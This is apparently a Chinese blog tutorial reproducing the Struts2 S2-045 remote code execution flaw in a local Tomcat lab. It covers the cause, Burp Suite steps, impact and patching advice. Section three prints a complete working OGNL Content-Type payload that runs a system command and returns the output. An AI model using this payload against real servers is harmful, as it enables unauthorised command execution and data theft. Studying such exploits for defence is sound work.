Struts2 命令执行漏洞 S2-045 复现:深入剖析与实战演练
前言
在当今网络安全形势日益严峻的大环境下,Web 应用框架的安全问题始终是信息安全领域关注的焦点。Struts2 作为一款广泛应用于 Java Web 开发的开源框架,其安全性直接关系到众多 Web 应用的稳定运行。今天,我们将深入探讨并实战复现 Struts2 中臭名昭著的 S2-045 命令执行漏洞,通过对这一漏洞的原理剖析、复现过程展示以及危害分析,为 Web 开发者和安全从业者提供全面的漏洞认知,助力大家筑牢网络安全防线。
一、漏洞原理:框架解析缺陷引发的安全危机
S2-045 漏洞的根源在于 Struts2 框架中 Jakarta Multipart 解析器处理文件上传时存在的致命缺陷。在正常的文件上传流程中,Jakarta Multipart 解析器会对 HTTP 请求中的 Content-Type 头进行解析,以此来识别上传文件的类型和相关参数。然而,这一解析过程却被攻击者利用。
恶意攻击者精心构造包含恶意 OGNL(Object - Graph Navigation Language)表达式的 Content-Type 头。OGNL 是 Struts2 框架中用于访问和操作对象属性的一种表达式语言。当 Struts2 框架尝试解析这个恶意的 Content-Type 头时,会错误地执行其中嵌入的 OGNL 表达式。由于这些表达式可以包含任意的 Java 代码,攻击者便能借此实现远程代码执行,进而获取服务器的控制权,对目标系统进行各种恶意操作。简单来说,这一漏洞就像是在坚固的城堡大门上开了一扇未被察觉的暗门,让攻击者可以轻易闯入。
二、复现环境搭建:搭建模拟战场,重现漏洞场景
复现 S2-045 漏洞需要精心搭建一个模拟环境,确保能够真实地重现漏洞利用过程。以下是详细的搭建步骤:
- 安装 Java 环境:Java 是 Struts2 运行的基础,因此首先要确保系统中安装了 Java 运行时环境(JRE)或 Java 开发工具包(JDK)。你可以前往 Oracle 官方网站,根据自己的操作系统版本下载对应的 Java 安装包。下载完成后,按照安装向导的提示逐步完成安装。安装结束后,打开命令行窗口,输入java -version,若能正确显示 Java 版本信息,如 “java version "11.0.18" 2023 - 01 - 17”,则表明 Java 环境安装成功。
- 搭建 Struts2 环境:从开源代码仓库,如 GitHub,搜索并下载包含 S2-045 漏洞的 Struts2 应用示例项目。下载完成后,将压缩包解压到指定目录。接下来,使用 Maven 或 Gradle 等构建工具对项目进行构建。这些构建工具会根据项目的pom.xml(Maven)或build.gradle(Gradle)文件,自动下载并配置项目所需的各种依赖库,确保项目能够正常运行。
- 启动 Web 服务器:假设我们使用的是 Tomcat 服务器,先从 Apache Tomcat 官方网站下载合适版本的 Tomcat 安装包,解压到指定路径。然后,将前面构建好的 Struts2 应用部署到 Tomcat 的 webapps 目录下。启动 Tomcat 服务器,在浏览器地址栏中输入http://localhost:8080/[应用名称],如果能够正常加载应用页面,显示出预期的内容,那就说明复现环境搭建大功告成,我们已经成功搭建好了漏洞复现的 “战场”。
三、复现步骤:步步为营,揭开漏洞利用的面纱
准备好复现环境后,接下来就进入到关键的漏洞复现环节,通过一步步的操作,展示攻击者是如何利用 S2-045 漏洞实现远程代码执行的:
- 准备攻击工具:这里我们推荐使用 Burp Suite,它是一款功能强大且广受欢迎的 Web 安全测试工具,为我们提供了丰富的功能来拦截、修改和分析 HTTP 请求。启动 Burp Suite,确保其代理功能已经正常开启,代理地址和端口通常默认为127.0.0.1:8080,这将用于拦截浏览器发送的 HTTP 请求。
- 构造恶意请求:打开浏览器,进入浏览器的代理设置界面,将代理地址设置为 Burp Suite 的代理地址127.0.0.1,端口设置为8080。然后,访问 Struts2 应用中具有文件上传功能的页面,比如常见的文件上传表单页面。在 Burp Suite 中,我们可以看到浏览器发送的上传请求已经被成功拦截。在拦截到的请求中,找到 Content-Type 头字段,将其内容修改为精心构造的恶意 OGNL 表达式,例如:
%{(#nike='multipart/form - data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
这个复杂的表达式实际上是一个精心设计的 “陷阱”,它会根据目标服务器的操作系统类型(Windows 或 Linux),选择执行相应的命令。在这个例子中,它会尝试执行id命令,该命令在 Linux 系统中用于查看当前用户信息,在 Windows 系统中虽不完全等同,但也能获取一些用户相关信息。表达式的逻辑是先获取 Struts2 框架的上下文信息,突破框架的访问限制,然后根据操作系统类型构造执行命令的参数,最后通过 Java 的ProcessBuilder类启动一个新的进程来执行命令,并将命令执行结果通过 HTTP 响应返回给攻击者。
3. 发送请求并查看结果:在 Burp Suite 中,将修改后的包含恶意表达式的请求发送出去。密切观察 Burp Suite 的响应内容,如果目标系统确实存在 S2-045 漏洞,那么在响应中我们将看到执行id命令的结果。例如,在 Linux 系统中,可能会看到类似 “uid=1000 (user) gid=1000 (group) groups=1000 (group),4 (adm),24 (cdrom),46 (plugdev),116 (lpadmin),126 (sambashare)” 的用户信息,这表明攻击者已经成功利用漏洞,在目标服务器上执行了恶意命令,获取到了系统的关键信息。
四、漏洞危害与修复建议:正视漏洞危害,筑牢安全防线
通过前面的复现过程,我们深刻认识到 S2-045 漏洞的巨大破坏力。下面我们来详细分析一下该漏洞的危害以及相应的修复建议:
- 漏洞危害:S2-045 漏洞堪称网络安全的 “定时炸弹”,一旦被攻击者利用,后果不堪设想。攻击者可以借助这个漏洞在目标服务器上执行任意命令,这意味着他们能够轻易获取服务器上的敏感文件内容,如用户账号密码、数据库连接配置文件等;还可以篡改系统配置,破坏系统的正常运行;甚至可以植入后门程序,长期控制目标服务器,随时窃取数据或发动进一步的攻击。这不仅会导致企业的数据泄露、业务中断,还可能引发严重的法律风险和声誉损失。
- 修复建议:对于使用 Struts2 框架的 Web 应用来说,及时修复 S2-045 漏洞是当务之急。最直接有效的方法就是将 Struts2 框架升级到官方修复后的版本,官方通常会在发现漏洞后发布安全补丁,修复这些已知的安全问题。同时,为了进一步加强 Web 应用的安全防护,建议部署 Web 应用防火墙(WAF)。WAF 就像是网络安全的 “守门员”,它可以对上传请求和其他 HTTP 请求进行严格的过滤和检测,识别并拦截包含恶意代码的请求,防止其到达服务器,从而为 Web 应用提供一层额外的安全保障。
通过本次对 S2-045 漏洞的深入复现和分析,我们清楚地认识到 Struts2 框架漏洞的严重性和危害性。在 Web 开发和运维的日常工作中,每一位开发者和安全从业者都应当时刻保持警惕,密切关注框架的安全动态,及时修复已知漏洞,采用多层安全防护措施,共同守护网络空间的安全与稳定。只有这样,我们才能在这场没有硝烟的网络安全战争中,立于不败之地,为用户和企业的数据安全保驾护航。
相关文章:
Struts2 命令执行漏洞 S2-045 复现:深入剖析与实战演练
前言 在当今网络安全形势日益严峻的大环境下,Web 应用框架的安全问题始终是信息安全领域关注的焦点。Struts2 作为一款广泛应用于 Java Web 开发的开源框架,其安全性直接关系到众多 Web 应用的稳定运行。今天,我们将深入探讨并实战复现 Stru…...
Spark 源码 | 脚本分析总结
前言 最初是想学习一下Spark提交流程的源码,比如 Spark On Yarn 、Standalone。之前只是通过网上总结的文章大概了解整体的提交流程,但是每个文章描述的又不太一样,弄不清楚到底哪个说的准确,比如Client 和 CLuster 模式的区别&a…...
2025.2.9 每日学习记录2:技术报告写了一半+一点点读后感
0.近期主任务线 1.完成小论文准备 目标是3月份完成实验点1的全部实验和论文。 2.准备教资笔试 打算留个十多天左右,一次性备考笔试的三个科目 1.实习申请技术准备:微调、Agent、RAG 1.今日完成任务 1.电子斗蛐蛐(文本书写领域&am…...
6、使用one-api管理统一管理大模型,并开始使用本地大模型
文章目录 本节内容介绍集中接入:将大模型统一管理起来当使用了大模型代理大模型代理示例 开源模型:如何使用Hugging Face上的模型modelscope使用 pipeline 调用模型用底层实现调用模型流式输出 如何在项目中使用开源模型使用 LangChain使用集中接入开始使…...
DFS+回溯+剪枝(深度优先搜索)——搜索算法
DFS也就是深度优先搜索,比如二叉树的前,中,后序遍历都属于DFS。其本质是递归,要学好DFS首先需要掌握递归。接下来咱们就一起来学习DFS涉及的算法。 一、递归 1.什么是递归? 递归可以这样理解把它拆分出来࿰…...
【数据结构】_堆的实现
目录 1. 堆的实现 1.1 Heap.h 1.2 Heap.c 1.3 Test_Heap.c 专栏前文中,已经介绍了入堆及向上调整算法,出堆及向下调整算法,详情见下文: 【数据结构】_堆的结构及向上、向下调整算法-CSDN博客文章浏览阅读352次,点…...
读书笔记《左耳听风》
读书笔记《左耳听风》 从今年开始,打算给自己定一下在看完书后整理成博客的计划。以往很多看完的书仅仅停留在看完,再回顾的时候总感觉已经不甚清晰了,希望能坚持下去。 《左耳听风》是今年我看完的第一本书,内容针对的是程序员…...
Axure原型图怎么通过链接共享
一、进入Axure 二、点击共享 三、弹出下面弹框,点击发布就可以了 发布成功后,会展示链接,复制即可共享给他人 四、发布失败可能的原因 Axure未更新,首页菜单栏点击帮助选择Axure更新,完成更新重复以上步骤即可...
本地部署DeepSeek,并使用UI界面进行快速交互
一.需要本地部署的原因 1.我们在deepseek的官网界面进行交互时,经常会出现如下问题,不能正常交互,很是困扰: 2.本地部署的好处 就是能够很流畅的与deepseek进行交互;也有缺点,现在官网交互的版本更高一点…...
ESP32S3读取数字麦克风INMP441的音频数据
ESP32S3 与 INMP441 麦克风模块的集成通常涉及使用 I2S 接口进行数字音频数据的传输。INMP441 是一款高性能的数字麦克风,它通过 I2S 接口输出音频数据。在 Arduino 环境中,ESP32S3 的开发通常使用 ESP-IDF(Espressif IoT Development Framew…...
移动(新)魔百盒刷机教程[M301A_YS]
刚刚成功刷了一个坏的魔百盒,简单记录一下。 刷电视盒子有两种:卡刷和线刷。 线刷 一、线刷准备 1.刷机工具 Amlogic USB Burning Tool 晶晨线刷烧录工具 2.固件 根据盒子的型号、代工等找到对应的固件 二、线刷步骤 电脑打开下好的 Amlogic US…...
15 大 AWS 服务
在不断发展的云计算世界中,Amazon Web Services (AWS) 已成为一股主导力量,提供许多服务以满足各种应用程序开发、部署和管理方面的需求。本文将探讨 15 项 AWS 服务。这些服务对于构建可扩展、可靠且高效的系统至关重要。 1.Amazon EC2(弹性…...
【C++】命名空间
🌟 Hello,我是egoist2023! 🌍 种一棵树最好是十年前,其次是现在! 目录 背景知识 命名空间(namespace) 为何引入namespace namespace的定义 namespace的使用 背景知识 C的起源要追溯到1979年࿰…...
项目实战(11)-双通道气体压力计V1.0
一. 产品简介: 1、项目背景是在实际应用中需要监控通道内气体的压力,压力计分为两个通道;通道一时实时监控;通道二是保压,设定保压值得上下限后通道内得气体压力值会一直保持在这个范围内。 二. 应用场景:…...
python+unity落地方案实现AI 换脸融合
先上效果再说技术结论,使用的是自行搭建的AI人脸融合库,可以离线不受限制无限次生成,有需要的可以后台私信python ai换脸融合。 TODO 未来的方向:3D人脸融合和AI数据训练 这个技术使用的是openvcinsighface,openvc…...
开启对话式智能分析新纪元——Wyn商业智能 BI 携手Deepseek 驱动数据分析变革
2月18号,Wyn 商业智能 V8.0Update1 版本将重磅推出对话式智能分析,集成Deepseek R1大模型,通过AI技术的深度融合,致力于打造"会思考的BI系统",让数据价值触手可及,助力企业实现从数据洞察到决策执…...
数据结构——【二叉树模版】
#思路 1、二叉树不同于数的构建,在树节点类中,有数据,左子结点,右子节点三个属性,在树类的构造函数中,添加了变量maxNodes,用于后续列表索引的判断 2.GetTreeNode()函数是常用方法,…...
DeepSeek之于心理学的一点思考
模型和硬件参数对应关系参考 模型参数规模 典型用途 CPU建议 GPU建议 最小内存建议 磁盘空间建议 适用场景 1.5b(15亿) 小型推理、轻量级任务 4核以上(Intel i5/AMD Ryzen5) 可选,入门级GPU(如NVIDIA GTX1650 4GB显存) 8GB 10GB以上SSD 小型NLP任务、文…...
mysql 存储过程和自定义函数 详解
首先创建存储过程或者自定义函数时,都要使用use database 切换到目标数据库,因为存储过程和自定义函数都是属于某个数据库的。 存储过程是一种预编译的 SQL 代码集合,封装在数据库对象中。以下是一些常见的存储过程的关键字: 存…...
数据结构:单链表
1.概念: 单链表(Singly Linked List)是一种常见的数据结构,它由一系列节点(Node)组成,每个节点包含两个部分: 数据域(Data):存储节点的值或数据。…...
部署项目(ubantu服务器,配置jdk,启动项目,及测试)
目录 1、ubantu安装jdk 2、部署项目 解决 java -jar 报错:xxx.jar 中没有主清单属性 3、测试 4、查看系统部署的应用 1、ubantu安装jdk #压缩文件jdk文件:tar -czvf jdk17.tar.gz jdk17 #解压jdk文件:tar -xzvf jdk17.tar.gz 参…...
deepseek本地部署教程
第一步:进入Ollama官网 (Download Ollama on macOS),下载ollama(注意需要Window10或更高的版本),安装(OllamaSetup.exe),默认在c盘 第二步:点击Models,再点击…...
MySQL主从同步+binlog
一、简介 MySQL内建的复制功能是构建大型,高性能应用程序的基础 通过将MySQL的某一台主机(master)的数据复制到其他主机(slaves)上,并重新执行一遍来执行 复制过程中一台服务器充当主服务器,而…...
防火墙术语大全( Firewalld Glossary of Terms)
防火墙术语大全 防火墙作为网络安全中不可或缺的设备,在各种网络架构中扮演着至关重要的角色。无论是企业级防火墙、云防火墙还是家用路由器内置的防火墙,它们的工作原理和配置策略都离不开一系列专业术语的支撑。对于网络工程师来说,掌握这…...
LeetCode刷题---数组---697
数组的度 697. 数组的度 - 力扣(LeetCode) 题目: 给定一个非空且只包含非负数的整数数组 nums,数组的 度 的定义是指数组里任一元素出现频数的最大值。 你的任务是在 nums 中找到与 nums 拥有相同大小的度的最短连续子数组&am…...
C语言基础08:运算符+流程控制总结
运算符 算术运算符 结果:数值 、-、*、\、%、(正)、-(负)、、-- i和i 相同点:i自身都会增1 不同点:它们运算的最终结果是不同的。i:先使用,后计算;i&am…...
[安装FlashAttention] CUDA版本 和 Nvidia驱动版本
nvidia-smi 查看driver api 的CUDA版本 听说这个是本机能装到的最高版本 那这样看来我最高能装到12.4。 nvcc -V 查看当前runtime api的CUDA版本 还是古老的11.5版本,没办法啊,FlashAttention老是说不支持? 安装Torch时选择的CUDA版本 p…...
Android图片加载框架Coil,Kotlin
Android图片加载框架Coil,Kotlin implementation("io.coil-kt:coil:1.4.0") import android.os.Bundle import android.widget.ImageView import androidx.appcompat.app.AppCompatActivity import androidx.lifecycle.lifecycleScope import coil.Coil i…...
Win11下搭建Kafka环境
目录 一、环境准备 二、安装JDK 1、下载JDK 2、配置环境变量 3、验证 三、安装zookeeper 1、下载Zookeeper安装包 2、配置环境变量 3、修改配置文件zoo.cfg 4、启动Zookeeper服务 4.1 启动Zookeeper客户端验证 4.2 启动客户端 四、安装Kafka 1、下载Kafka安装包…...
从大规模恶意攻击 DeepSeek 事件看 AI 创新隐忧:安全可观测体系建设刻不容缓
作者:羿莉(萧羿) 全球出圈的中国大模型 DeepSeek 作为一款革命性的大型语言模型,以其卓越的自然语言处理能力和创新性成本控制引领行业前沿。该模型不仅在性能上媲美 OpenAI-o1,而且在推理模型的成本优化上实现了突破…...
模拟(典型算法思想)—— OJ例题算法解析思路
目录 一、1576. 替换所有的问号 - 力扣(LeetCode) 运行代码: 1. 输入和输出 2. 变量初始化 3. 遍历字符串 4. 替换逻辑 5. 返回结果 整体分析 1. 思路总结 2. 为什么要这样设计 3. 时间复杂度与空间复杂度 4. 边界情况 二、495. 提莫攻击 - 力扣(LeetCode) …...
pgsql最快的数据导入BeginBinaryImport
PostgreSQL 的 BeginBinaryImport 是 libpq(PostgreSQL 的 C 语言客户端库) 中的一个函数,用于高效实现二进制数据的大批量导入。以下是详细介绍及适用语言说明: BeginBinaryImport 的作用 功能 它是 PostgreSQL C 接口库…...
【进程与线程】如何编写一个守护进程
如何编写一个守护进程。我们首先需要理解守护进程是什么。守护进程是在后台运行的进程,通常没有控制终端,用于执行系统任务,比如服务器或者定时任务。 用户可能想创建一个长期运行的服务,比如Web服务器或者日志监控程序。 首先&a…...
Docker容器访问外网:启动时的网络参数配置指南
在启动Docker镜像时,可以通过设置网络参数来确保容器能够访问外网。以下是几种常见的方法: 1. 使用默认的bridge网络 Docker的默认网络模式是bridge,它会创建一个虚拟网桥,将容器连接到宿主机的网络上。在大多数情况下,使用默认的bridge网络配置即可使容器访问外网。 启动…...
大数据-259 离线数仓 - Griffin架构 修改配置 pom.xml sparkProperties 编译启动
点一下关注吧!!!非常感谢!!持续更新!!! Java篇开始了! 目前开始更新 MyBatis,一起深入浅出! 目前已经更新到了: Hadoop࿰…...
DeepSeek神经网络:技术架构与实现原理探析
以下是一篇关于DeepSeek神经网络的研究及实现原理的综述性文章,结合其技术架构、训练范式及创新点展开分析: 1. 核心架构设计 DeepSeek的神经网络架构以**混合专家模型(Mixture of Experts, MOE)**为基础,结合轻量化…...
KTOR:高效的Linux横向移动与无文件落地HTTP服务扫描工具
地址:https://github.com/MartinxMax/KTOR 简介 KTOR 是一款专为 Linux 横向渗透设计的工具。通过该工具,您可以快速扫描内部 HTTP 服务,以便进一步进行网络渗透,且实现无文件落地扫描。 在CTF中通常需要利用本地其他端口HTTP服务或其他主…...
C++ Primer 类型转换
欢迎阅读我的 【CPrimer】专栏 专栏简介:本专栏主要面向C初学者,解释C的一些基本概念和基础语言特性,涉及C标准库的用法,面向对象特性,泛型特性高级用法。通过使用标准库中定义的抽象设施,使你更加适应高级…...
2025新的一年网络营销推广该怎么干?
2025年,全球网民数量预计突破60亿,但流量红利消退、用户注意力稀缺、技术迭代加速……企业网络营销正面临前所未有的“生存战”。如何在竞争中突围?小马识途营销机构基于十五年实战经验,总结出2025年企业必须抢占的五大核心战场&a…...
java实现Http请求方式的几种常见方式
背景 在实际开发过程中,我们经常需要调用对方提供的接口或测试自己写的接口是否合适。很多项目都会封装规定好本身项目的接口规范,所以大多数需要去调用对方提供的接口或第三方接口(短信、天气等)。若是普通java工程推荐使用OkHt…...
安卓开发,底部导航栏
1、创建导航栏图标 使用系统自带的矢量图库文件,鼠标右键点击res->New->Vector Asset 修改 Name , Clip art 和 Color 再创建一个 同样的方法再创建四个按钮 2、添加百分比布局依赖 app\build.gradle.kts 中添加百分比布局依赖,并点击Sync Now …...
Spring Boot中实现多租户架构
文章目录 Spring Boot中实现多租户架构多租户架构概述核心思想多租户的三种模式优势挑战租户识别机制1. 租户标识(Tenant Identifier)2. 常见的租户识别方式3. 实现租户识别的关键点4. 租户识别示例代码5. 租户识别机制的挑战数据库隔离的实现1. 数据库隔离的核心目标2. 数据…...
SpringBoot源码解析(十):应用上下文AnnotationConfigServletWebServerApplicationContext构造方法
SpringBoot源码系列文章 SpringBoot源码解析(一):SpringApplication构造方法 SpringBoot源码解析(二):引导上下文DefaultBootstrapContext SpringBoot源码解析(三):启动开始阶段 SpringBoot源码解析(四):解析应用参数args Sp…...
vue3+vite全局loading
vue3vite全局loading j-loading.vue组件 <template><transition enter-active-class"animate__animated animate__fadeIn"leave-active-class"animate__animated animate__fadeOut"><div class"root-box" v-if"show"…...
比亚迪发布智能化战略,天神之眼开创全民智驾
2月10日,比亚迪在深圳隆重召开智能化战略发布会,正式向全球发布了其最新的智驾技术——“天神之眼”。这一技术的发布,标志着比亚迪在智能驾驶领域迈出了坚实的一步,稳居行业第一梯队,真正实现了端到端的智能驾驶体验&…...
在 MySQL 中,通过存储过程结合条件判断来实现添加表字段时,如果字段已存在则不再重复添加
-- 创建存储过程 DELIMITER $$ CREATE PROCEDURE add_column(IN db_name VARCHAR(255),IN table_name VARCHAR(255),IN column_name VARCHAR(255),IN column_definition VARCHAR(255),IN column_comment VARCHAR(255) ) BEGINDECLARE column_exists INT;-- 检查字段是否存在SEL…...
UP-VLA:具身智体的统一理解与预测模型
25年1月来自清华大学和上海姚期智研究院的论文“UP-VLA: A Unified Understanding and Prediction Model for Embodied Agent”。 视觉-语言-动作 (VLA) 模型的最新进展,利用预训练的视觉语言模型 (VLM) 来提高泛化能力。VLM 通常经过视觉语言理解任务的预训练&…...
后端开发ThreadLocal简介
ThreadLocal是线程的局部变量,为每个线程单独提供一份存储空间,具有线程隔离的效果,只有线程内能获取到对应的值 客户端发起的每次请求都对应一个单独的线程 常用方法 public void set(T value) 设置当前线程局部变量值public T get() 返回…...
AI分支知识之机器学习,深度学习,强化学习的关系
机器学习,深度学习,强化学习的关系 这一篇文章我们来探讨下AI领域中机器学习(ML)、深度学习(DL)和强化学习(RL)的关系。 一、机器学习(ML):从数…...
微信小程序案例2——天气微信小程序(学会绑定数据)
文章目录 一、项目步骤1 创建一个weather项目2 进入index.wxml、index.js、index.wxss文件,清空所有内容,进入App.json,修改导航栏标题为“中国天气网”。3进入index.wxml,进行当天天气情况的界面布局,包括温度、最低温、最高温、天气情况、城市、星期、风行情况,代码如下…...